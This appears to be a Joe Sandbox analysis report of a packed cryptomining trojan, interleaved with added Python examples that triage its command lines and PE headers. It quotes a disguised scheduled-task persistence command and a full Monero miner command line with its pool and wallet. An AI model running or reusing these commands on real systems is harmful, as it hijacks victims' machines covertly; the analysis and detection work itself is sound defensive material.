              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2

              System Summary:

              PE file contains section with special chars
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name:
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name:
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name:
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name:
              Source: zmql3v0y.exe.0.dr | Static PE information: section name:
              Source: zmql3v0y.exe.0.dr | Static PE information: section name:
              Source: zmql3v0y.exe.0.dr | Static PE information: section name:
              Source: RantimeBroker.exe.6.dr | Static PE information: section name:
              Source: RantimeBroker.exe.6.dr | Static PE information: section name:
              Source: RantimeBroker.exe.6.dr | Static PE information: section name:
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Code function: 4_2_003D1D30
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Code function: 4_2_003D4928
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\pg2bsuqa.exe 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\zmql3v0y.exe 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: invalid certificate
              Source: pg2bsuqa.exe.0.dr | Static PE information: Number of sections : 11 > 10
              Source: cpu.exe.6.dr | Static PE information: Number of sections : 13 > 10
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: pg2bsuqa.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000003.237103950.0000000000F40000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284646419.0000000006030000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280825476.0000000001100000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Section: ZLIB complexity 0.989800347222
              Source: WinRing0x64.sys.6.dr | Binary string: \Device\WinRing0_1_2_0
              Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@13/9@9/5
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File created: C:\Users\user\AppData\Local\pg2bsuqa.exe
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Mutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Metadefender: Detection: 21%
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | ReversingLabs: Detection: 28%
              Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
              Source: unknown | Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: unknown | Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static file information: File size 2817248 > 1048576
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x2a7200
              Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WinRing0x64.sys.6.dr
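The process tree above carries the two command lines that matter most for this sample: the schtasks.exe call that re-launches RantimeBroker.exe every minute, and the cpu.exe call that carries the XMRig pool, algorithm and wallet in clear on the command line. The following Python is an added example (not part of the Joe Sandbox report) that tokenises such command lines and pulls out exactly those indicators; the three sample command lines are copied from the report's "Process created" entries, and the user-writable path pattern and the five-minute threshold are assumptions.

```python
"""Triage of process-creation command lines from a sandbox process tree.

Added example, not part of the Joe Sandbox report. The command lines below are
copied from the report; path patterns and the frequency threshold are assumptions.
"""
import re

# Constructed input: the command lines quoted in the report's "Process created" entries.
SAMPLE_CMDLINES = [
    "'C:\\Windows\\System32\\schtasks.exe' /create /sc MINUTE /mo 1 "
    "/tn 'Windows Service Microsoft Corporation' "
    "/tr 'C:\\Users\\user\\AppData\\Roaming\\Windows\\RantimeBroker.exe' /f",
    "'C:\\Users\\user\\AppData\\Roaming\\Windows\\CPU\\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 "
    "--algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ "
    "--donate-level=1",
    "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
]

TOKEN = re.compile(r"'([^']*)'|\"([^\"]*)\"|(\S+)")
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\", re.I)  # assumption
STRATUM = re.compile(r"stratum\+(?:tcp|ssl|tls)://([^:/\s]+):(\d+)", re.I)
MAX_MINUTES = 5   # assumption: a task firing at least every 5 minutes is a watchdog, not maintenance


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace while honouring single and double quotes; backslashes are kept."""
    return [a or b or c for a, b, c in TOKEN.findall(cmdline)]


def options(tokens: list[str], prefixes=("/", "-")) -> dict[str, str]:
    """Map switch -> value, handling '/sc MINUTE', '-o url' and '--donate-level=1' forms."""
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith(prefixes):
            key, eq, val = tok.partition("=")
            if not eq and i + 1 < len(tokens) and not tokens[i + 1].startswith(prefixes):
                val = tokens[i + 1]
                i += 1
            opts[key.lower()] = val
        i += 1
    return opts


def check_schtasks(tokens: list[str]):
    """Flag scheduled-task creation that keeps a payload in a user-writable path alive."""
    if not tokens or not tokens[0].lower().endswith("schtasks.exe"):
        return None
    opts = options(tokens)
    if "/create" not in opts:
        return None
    findings = []
    if opts.get("/sc", "").upper() == "MINUTE":
        minutes = int(opts.get("/mo") or 1)
        if minutes <= MAX_MINUTES:
            findings.append(f"re-launch every {minutes} minute(s) restarts the payload if it is killed")
    target = opts.get("/tr", "")
    if USER_WRITABLE.search(target):
        findings.append("task runs a binary from a user-writable directory")
    if "/f" in opts:
        findings.append("/f silently replaces any existing task with this name")
    return {"kind": "scheduled-task", "task": opts.get("/tn"), "target": target, "findings": findings}


def check_miner(tokens: list[str]):
    """Extract pool, port, algorithm and wallet from an XMRig-style command line."""
    match = STRATUM.search(" ".join(tokens))
    if not match:
        return None
    opts = options(tokens)
    return {"kind": "miner", "pool": match.group(1), "port": int(match.group(2)),
            "algo": opts.get("--algo"), "wallet": opts.get("-u"), "donate": opts.get("--donate-level"),
            "findings": ["Stratum mining protocol on a non-standard port"]}


def triage(cmdlines: list[str]) -> list[dict]:
    """Run every check over every command line; benign lines produce no entry."""
    hits = []
    for line in cmdlines:
        tokens = tokenize(line)
        for check in (check_schtasks, check_miner):
            hit = check(tokens)
            if hit:
                hit["cmdline"] = line
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(hit["kind"], hit.get("task") or hit.get("pool"), hit["findings"])
```

The tokeniser is deliberate: `shlex.split` in POSIX mode eats the backslashes in Windows paths, so the example uses a small quote-aware regex instead. The wallet string is reported verbatim because it is the one indicator here that the attacker cannot rotate without losing payouts.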

              Data Obfuscation:

              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.2e0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Unpacked PE file: 6.2.zmql3v0y.exe.b30000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Unpacked PE file: 15.2.RantimeBroker.exe.d80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Binary contains a suspicious time stamp
              Source: initial sample | Static PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
              Source: initial sample | Static PE information: section where entry point is pointing to: .boot
              Source: zmql3v0y.exe.0.dr | Static PE information: real checksum: 0x280d9c should be: 0x285c9a
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: real checksum: 0x2b2b3a should be: 0x2b9e3b
              Source: RantimeBroker.exe.6.dr | Static PE information: real checksum: 0x280d9c should be: 0x285c9a
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: .themida
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: .boot
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name:
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name:
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name:
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .apk0
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .themida
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .boot
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .apk1
              Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .apk2
              Source: zmql3v0y.exe.0.dr | Static PE information: section name:
              Source: zmql3v0y.exe.0.dr | Static PE information: section name:
              Source: zmql3v0y.exe.0.dr | Static PE information: section name:
              Source: zmql3v0y.exe.0.dr | Static PE information: section name: .themida
              Source: zmql3v0y.exe.0.dr | Static PE information: section name: .boot
              Source: RantimeBroker.exe.6.dr | Static PE information: section name:
              Source: RantimeBroker.exe.6.dr | Static PE information: section name:
              Source: RantimeBroker.exe.6.dr | Static PE information: section name:
              Source: RantimeBroker.exe.6.dr | Static PE information: section name: .themida
              Source: RantimeBroker.exe.6.dr | Static PE information: section name: .boot
              Source: cpu.exe.6.dr | Static PE information: section name: _RANDOMX
              Source: cpu.exe.6.dr | Static PE information: section name: _SHA3_25
              Source: cpu.exe.6.dr | Static PE information: section name: _TEXT_CN
              Source: cpu.exe.6.dr | Static PE information: section name: _TEXT_CN
              Source: cpu.exe.6.dr | Static PE information: section name: _RDATA
              Source: cpu.exe.6.dr | Static PE information: section name: 0
              Source: cpu.exe.6.dr | Static PE information: section name: 1
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Code function: 4_2_003D8570 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Code function: 15_2_03CA0007 push es; retf 0003h
              Source: initial sample | Static PE information: section name: entropy: 7.58163620158
              Source: initial sample | Static PE information: section name: entropy: 7.89210158409
              Source: initial sample | Static PE information: section name: entropy: 7.89210158409
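The static findings in the System Summary (section names made of non-printable characters) and in this Data Obfuscation section (a link time in the year 2096, a PE checksum that does not match the file, .themida and .boot sections with entropy near 7.9) all fall out of one walk over the PE header and section table. The block below is an added example, not code from the report or from Joe Sandbox, that performs that walk with the standard library only. It builds its own minimal PE32 image as test input, so it runs offline; the entropy threshold, the list of packer section names and the analysis date are assumptions. The checksum routine is the ImageHlp CheckSumMappedFile algorithm (16-bit one's-complement sum, excluding the CheckSum field, plus file length), which is what the report's "real checksum ... should be" line compares against.

```python
"""Static PE triage (added example): section names, entropy, link time, header checksum."""
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

ENTROPY_HIGH = 7.0                                   # assumption: above this, treat as packed/encrypted
PACKER_NAMES = {b".themida", b".boot", b".apk0"}     # section names the report ties to the Themida packer


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 8.0 for uniform random data, ~0 for a constant fill."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """CheckSumMappedFile: one's-complement sum of 16-bit words, skipping the CheckSum
    field itself, folded to 16 bits, plus the file length."""
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off in (checksum_off, checksum_off + 2):
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    total += data[-1] if len(data) % 2 else 0           # odd trailing byte
    total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    checksum_off = opt + 64                          # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0"), data[raw_ptr:raw_ptr + raw_size]))
    return {"timestamp": timestamp, "checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "checksum_off": checksum_off, "sections": sections}


def triage(data: bytes, now: int) -> list[str]:
    """Return the static findings a sandbox report would print for this image."""
    pe = parse_pe(data)
    findings = []
    stamp = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    if pe["timestamp"] == 0 or pe["timestamp"] > now:
        findings.append(f"suspicious time stamp: 0x{pe['timestamp']:08X} [{stamp:%a %b %d %H:%M:%S %Y} UTC]")
    expected = pe_checksum(data, pe["checksum_off"])
    if pe["checksum"] != expected:
        findings.append(f"checksum mismatch: real 0x{pe['checksum']:x} should be 0x{expected:x}")
    for name, body in pe["sections"]:
        if not name or any(b < 0x20 or b > 0x7E for b in name):
            findings.append(f"section with special chars: {name!r}")
        elif name in PACKER_NAMES:
            findings.append(f"packer section name: {name.decode()}")
        entropy = shannon_entropy(body)
        if entropy > ENTROPY_HIGH:
            findings.append(f"high-entropy section {name!r}: {entropy:.3f}")
    return findings


def build_sample(timestamp: int, sections: list, fix_checksum: bool) -> bytes:
    """Constructed minimal PE32 image for offline testing; it is not a runnable executable."""
    opt_size = 0xE0
    raw_ptr, table, bodies = 0x40 + 4 + 20 + opt_size + 40 * len(sections), b"", b""
    for name, body in sections:
        table += struct.pack("<8sIIII", name, len(body), 0x1000, len(body), raw_ptr)
        table += b"\0" * 12 + struct.pack("<I", 0x60000020)     # CNT_CODE | EXECUTE | READ
        bodies += body
        raw_ptr += len(body)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x102)
    image = dos + b"PE\0\0" + coff + struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2) + table + bodies
    checksum_off = 0x40 + 4 + 20 + 64
    value = pe_checksum(image, checksum_off) if fix_checksum else 0x280D9C   # wrong value, as in the report
    return image[:checksum_off] + struct.pack("<I", value) + image[checksum_off + 4:]


_rng = random.Random(0xEEB5)
SAMPLE = build_sample(
    0xEEB543EE,                                      # the report's link time: 27 Nov 2096
    [(b".text", b"\x90" * 1024),
     (b"\x00\x01\x02", b"\x00" * 256),               # non-printable section name
     (b".themida", bytes(_rng.getrandbits(8) for _ in range(4096))),
     (b".boot", bytes(_rng.getrandbits(8) for _ in range(4096)))],
    fix_checksum=False,
)
NOW = 1613000000                                     # assumption: analysis ran in February 2021
```

Running `triage(SAMPLE, NOW)` reproduces each class of finding listed above: the 2096 time stamp, the 0x280d9c checksum that does not match, the unprintable section name, and the two packer sections that are both named like Themida output and filled with near-8-bit entropy. On a real file, read the bytes and pass `int(time.time())` as `now`; a time stamp in the future is a hard indicator, while a zero stamp is merely reproducible-build noise and worth a lower score.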

              Persistence and Installation Behavior:

              Sample is not signed and drops a device driver
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File created: C:\Users\user\AppData\Local\zmql3v0y.exe
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File created: C:\Users\user\AppData\Local\pg2bsuqa.exe
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe

              Boot Survival:

              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX (38 occurrences)
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Process information set: NOOPENFILEERRORBOX (42 occurrences)
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences in this excerpt)
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
